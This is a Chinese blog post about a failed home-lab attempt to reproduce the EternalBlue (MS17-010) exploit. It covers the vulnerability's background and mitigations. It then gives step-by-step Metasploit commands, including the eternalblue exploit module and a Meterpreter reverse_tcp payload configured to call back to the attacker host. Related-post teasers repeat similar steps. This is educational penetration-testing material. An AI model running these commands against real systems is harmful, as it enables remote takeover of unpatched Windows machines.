【漏洞复现】永恒之蓝(努力过,失败了)

于 2024-09-13 14:02:27 发布
阅读量971 收藏 26
点赞数 31
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53379921/article/details/142163477
版权

一、漏洞介绍

 

1.1 什么是永恒之蓝

永恒之蓝(EternalBlue)是一个网络安全漏洞,它影响微软Windows操作系统的SMB(服务器消息块)协议。这个漏洞最初由美国国家安全局(NSA)发现并用于其网络间谍活动。但后来,一个名为“影子经纪人”(Shadow Brokers)的神秘团体在2017年泄露了这个漏洞和其他一些工具。

 

1.2 漏洞原理

  • 永恒之蓝(EternalBlue)漏洞的原理涉及对微软Windows操作系统中SMB(服务器消息块)协议的实现方式的攻击来获取系统的最高权限,以此来达到控制目标计算机的目的。通过永恒之蓝漏洞会扫描445文件共享端口的Windows机器,无需用户任何操作只要开机上网,就能被植入恶意程序。由此不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全球范围内遭受到病毒的攻击。
  • SMB(Server Message Block)是一个协议服务器信息块,是一种客户机/服务器、请求/相应协议,通过SMB协议可以在计算机间共享文件等资源。SMB协议工作在应用层和会话层,可以用在TCP/IP协议上,使用TCP139和445端口

 

1.3漏洞的安全影响

该漏洞被广泛利用,其中最著名的是WannaCry勒索软件攻击,该攻击在2017年影响了全球数十万台计算机。由于这个漏洞的严重性和被利用的广泛性,它促使微软发布了针对已停止支持的Windows版本的补丁。

 

1.4 漏洞的防范措施

  • 为系统安装最新的安全更新。
  • 如果不需要,禁用SMB服务,特别是对于互联网直接可见的系统。
  • 使用防火墙阻止来自不信任来源的SMB流量

 

二、环境配置

 

2.1 虚拟机环境

        攻击机:kali        192.168.1.128

        目标:Windows7        192.168.1.133

        漏洞:MS17-010(永恒之蓝)

 

2.2matesploit框架

matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。

1. 检查更新

  • apt update
  • apt install metasploit-framework

 

2. 查看版本

  • msfconsole -V

3223ad24db6c40fe9273f1078172bef9.png

 

3. 进入攻击框架

  • cd /usr/share/metasploit-framework
  • msfconsole

a1495e3056bf4e618c68d1e9a1c75722.png

 

三、复现过程

3.1 确定目标及漏洞

1. msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.1.133),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。

  • ping 192.168.1.133
  • nmap -sS -A 192.168.1.133

                -sS:使用TCP SYN扫描来隐藏扫描活动

                -A:使用TCP SYN扫描来隐藏扫描活动。

595d6d28988b409a9cc8c2461be8e9c5.png

b299a6d98f1f4055b6a336d946deee13.png

搜索版本漏洞方法:

1. 网上搜索

2. 进入MSF模块后search

3. searchsploit xxx(IIS、Apache)

8543024d5fe14065936cb1aa6b31e55a.png

37482de704be4cfa9c21b368515101a6.png

 

 

3.2 尝试攻击

1. 使用search ms17-010命令,搜索MS17-010漏洞模块

3b489fb09a6643dcbd364d7d8aabbfe2.png

发现以下模块:

  • exploits—漏洞利用攻击模块
  • auxiliary—辅助扫描漏洞模块

0-4中如何选择?先选择扫描模块检测漏洞是否存在(2或3)

  • 0:让靶机变蓝屏
  • 1:用于主机横向渗透
  • 4:SMB远程代码执行

 

2. 选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击

  • use auxiliary/scanner/smb/smb\_ms17\_010

其次使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)

8e10e14e86184bfd8b4d0291a6df1132.png

 

3. 设置目标地址与目标端口

  • set RHOSTS 192.168.1.133
  • set RPORT 445

491766645bac4a13948e08c31654927b.png

最后使用run或者exploit命令去查看漏洞是否存在

65de70978a1f431483a5100ea021974a.png

Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010漏洞,可以去利用。 检测到该目标操作系统是Windows 7 专业版 接下来我们可以利用exploits模块进行渗透攻击。
有+号就可以攻击,可以进行IP范围扫描

 

3.3 利用exploist模块进行渗透

1. 在3.2步骤中已经检测到目标存在该漏洞,现在开始进行渗透。使用back命令退出辅助模块

25ea2586d6b84c5f9141ead4430a65ee.png

 

2. 继续使用search MS17-010命令,搜索MS17-010模块

3b489fb09a6643dcbd364d7d8aabbfe2.png

 

3. 在3.2的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。

  • use exploit/windows/smb/ms17_010_eternalblue

e8d196ed29f7469c9b43a2879e35f41f.png

 

切换攻击模块

  • set payload windows/x64/meterpreter/reverse_tcp

36d2afd4c94f40858dbd5c3c21b7ab98.png

 

4.  设置模块必要信息

更改靶机地址(win7)

set rhost 192.168.1.113

更改攻击者IP(kali)

set lhost 192.168.1.128

57835893bbaa43ae818be376a2aa9168.png

 

使用show options命令,查看需要设置的参数

b03ae8edbdb445d29f1fc2d7266f9d23.png

 

 

4. 运行!!!拿不下靶机

abd7cd01a0d94cf78db45ef046ddd30c.png

天呐,卡在这一步了!!各种尝试,有没有大佬救救命

 

 

钢镚儿~
关注
ms17-010(永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝漏洞
ZXT02的博客
12-21 1206
仅限学习使用!!!
永恒之蓝漏洞复现及上传后门程序
dreamthe的博客
11-18 3798
自己实在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,自己去选择版本 这里记得选择桥接模式 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 可以ka里面用nmap扫描靶机开了那些端口 输入msfdb run 进入msf中 开始搜索ms17_010 命令 search ms17_010 先使用aux模块扫描靶机有无漏洞 步骤如下 第一步 使用扫描模块 use a...
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4155
ms17-010,永恒之蓝漏洞复现
永恒之蓝(MS17-010)漏洞复现
tubug的博客
05-21 6996
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
永恒之蓝(EternalBlue)的网络安全漏洞
最新发布
hljdengbaoceping的博客
07-29 492
一经公开,该漏洞迅速被不法分子利用,引发了全球范围的大规模网络攻击,其中最著名的案例是WannaCry(想哭)勒索软件和NotPetya(非彼佳)破坏性恶意软件的爆发。•NotPetya:同年6月,NotPetya虽然看似勒索软件,实则更倾向于具有破坏性的蠕虫病毒,同样利用了永恒之蓝进行传播,对乌克兰等多个国家的基础设施造成了严重影响。•WannaCry:2017年5月,WannaCry利用永恒之蓝漏洞在全球范围内迅速传播,导致医院、电信公司、快递服务等多个行业系统瘫痪,影响巨大。
网络安全必学渗透测试流程
qq_44005305的博客
02-12 628
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
永恒之蓝漏洞复现(MS17010)
qq_52107280的博客
07-22 1502
永恒之蓝实验(MS17010) 1.概念 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 2.什么是ART A
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 599
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
12-28 9659
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8701
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
ms17-010(永恒之蓝漏洞
m0_74062309的博客
07-06 743
永恒之蓝指NSA泄露的危险漏洞“EternalBlue”,此次的勒索病毒WannaCry是利用该漏洞进行传播的。爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。
永恒之蓝--漏洞复现.
qq_44640313的博客
11-27 111
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
永恒之蓝漏洞复现
weixin_39096432的博客
04-03 848
永恒之蓝漏洞复现 清明节闲得无聊,突然想起2017年差不多这时候爆发的利用永恒之蓝漏洞进行传播的雷索病毒,今天又重现了一下,顺便记录一下。 概述:永恒之蓝漏洞有多危险,只要开着机,且开启445端口(文件共享端口)攻击者可以获得计算机的权限,能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 复现场景: 攻击机:Linux kali(IP:192.168.114.131) 靶机:Windows 2008R2 (IP:192.168.114.147) 复现流程大致是这样的: MSF框架--
使用MSF复现永恒之蓝
11-27
为了使用MSF复现永恒之蓝漏洞,可以按照以下步骤进行操作: 1. 打开终端并启动msfconsole,输入以下命令: ```shell msfconsole ``` 2. 在msfconsole中,使用search命令搜索ms17-010漏洞: ```shell search ms17-010 ``` 3. 选择一个合适的exploit并设置相关参数,例如: ```shell use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标IP地址> set RPORT 445 ``` 4. 运行exploit并等待结果: ```shell run ``` 5. 如果成功利用漏洞,将会得到一个Meterpreter shell,可以使用各种命令进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值